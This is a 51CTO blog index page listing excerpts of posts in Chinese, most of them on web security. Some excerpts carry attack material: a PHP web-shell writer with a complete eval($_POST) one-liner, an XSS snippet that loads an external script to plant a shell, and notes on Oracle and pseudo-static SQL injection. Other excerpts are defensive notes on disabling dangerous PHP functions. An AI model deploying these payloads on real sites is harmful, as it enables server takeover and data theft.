51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频 免费课程 课程排行 直播课 软考学堂
全部课程 厂商认证 IT技术 24年11月软考 PMP项目管理 免费题库
在线学习
文章 资源 问答 课堂 专栏 直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库

我的友情链接

51CTO博客开发

原创 2017-11-22 23:11:02 234 阅读

python 写的一款百度关键字url多线程采集

# coding: UTF-8 import urllib import re import sys import os import threading from time import ctime #sys.stderr = None #获取每页URL,返回当前页URL&n

python
转载 精选 2015-07-05 17:57:05 2308 阅读

Oracle显错注入函数

Oracle包utl_inaddr  作用:用于取得局域网或Internet环境中的主机名和IP地址。  1、utl_inaddr.get_host_address 环境中IP地址  如果查询失败,则提示系统错误  查询的IP地址  select UTL_INADDR.get_host_address('www.qq.com') from dual;  查询本机IP地址  select UTL_I

转载 精选 2015-07-04 13:13:26 1328 阅读

php防注入

 ---恢复内容开始---php网站如何防止sql注入?网站的运行安全肯定是每个站长必须考虑的问题,大家知道,大多数黑客攻击网站都是采用sql注入,这就是我们常说的为什么最原始的静态的网站反而是最安全的。 今天我们讲讲PHP注入的安全规范,防止自己的网站被sql注入。如今主流的网站开发语言还是php,那我们就从php网站如何防止sql注入开始说起:Php注入的安全防范通过上面的过程,我们

PHP
转载 精选 2015-07-04 13:12:19 647 阅读

一些需要禁用的PHP危险函数

 phpinfo()功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。危险等级:中passthru()功能描述:允许执行一个外部程序并回显输出,类似于 exec()。危险等级:高exec()功能描述:允许执行一个外部程序(如 UNIX Shell 或 CMD 命令等)。危险等级:高system()功能描述:允许执行一个外部程序并回显输出,类似于 passthru()。危

转载 精选 2015-07-04 13:11:01 347 阅读

bash测试脚本py

#!/usr/bin/python# coding=UTF-8__author__ = ‘Andy’import requestsimport systry:if sys.argv[1] == ‘–help’:print ‘usage : python test.py http://mydomain.com trojan.sh http://target.com’ex

python
转载 精选 2015-07-04 13:10:18 478 阅读

PHP中__construct(), __destory(), __get(), __set(), __call(), __toString(), __clo

(1)__construct() 是PHP内置的构造函数, 是同PHP 解析引擎自动调用的, 当实例化一个对象的时候,这个对象的这个方法首先被调用。例:class Test{function __construct(){echo "This is __construct function!";}function Test(){echo "This is Test!";}}$objTest = ne

PHP
转载 精选 2015-07-04 13:09:26 764 阅读

4种伪静态注入

[4种伪静态注入方法讲解 全文]伪静态,主要是为了隐藏传递的参数名,伪静态只是一种URL重写的手段,既然能接受参数输入,所以并不能防止注入。目前来看,防止注入的最有效的方法就是使用LINQ。常规的伪静态页面如下:http://www.XXX.com/play/Diablo.html, 在看到之前先要确定这个页面是静态还是伪静态,鉴别方法很多。例如关联的动态页面是game.php ,那么当用户访问后

SQL注入
转载 精选 2015-07-04 13:08:32 916 阅读

php写shell脚本

<?php $file="jack.php";//可根据文件名更改,也可以写入指定一个目录.fwrite(fopen("$file","w+"),$_GET['badboy']);?> PS:感谢朋友们,欢迎大家交流http://127.0.0.1/1.php?badboy=<?php eval($_POST[h]);?>

PHP
原创 2015-07-04 13:07:30 794 阅读

PHP中$_SERVER的详细参数

$_SERVER['PHP_SELF'] #当前正在执行脚本的文件名,与 document root相关。$_SERVER['argv'] #传递给该脚本的参数。$_SERVER['argc'] #包含传递给程序的命令行参数的个数(如果运行在命令行模式)。$_SERVER['GATEWAY_INTERFACE'] #服务器使用的 CGI 规范的版本。例如,“CGI/1.1”。$_SERVER['S

PHP
转载 精选 2015-07-04 12:24:08 388 阅读

xss+csrf生成一句话

1、找到存在xss的地方提交代码:例如:<script src=http://xxx.com/js.js></script>;2、构造该js.var request = false;if(window.XMLHttpRequest) {request = new XMLHttpRequest();if(request.overrideMimeType) {request.o

转载 精选 2015-07-04 12:23:13 1744 阅读

幸福常常在别人眼里

     人生烦恼无数!先贤说,把心静下来,什么也不去想,就没有烦恼了。先贤的话,像扔进水中的石头,而芸芸众生在听得“咕咚”。一声闷响之后,烦恼便又涟漪一般荡漾开来,而且层出不穷。    幸福总围绕在别人身边,烦恼总纠缠在自己心里,这是大多数人对幸福和烦恼的理解。差学生以为考了高分就可以没有烦恼,贫穷的人以为有了钱就可以得到幸福。结果是有烦恼的依旧难消烦恼,不幸福的仍

生活
原创 2015-07-04 12:18:47 310 阅读

Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号

关于我们
官方博客 全部文章 热门标签 班级博客
了解我们 网站地图 意见反馈
友情链接
鸿蒙开发者社区 51CTO学堂
51CTO 软考资讯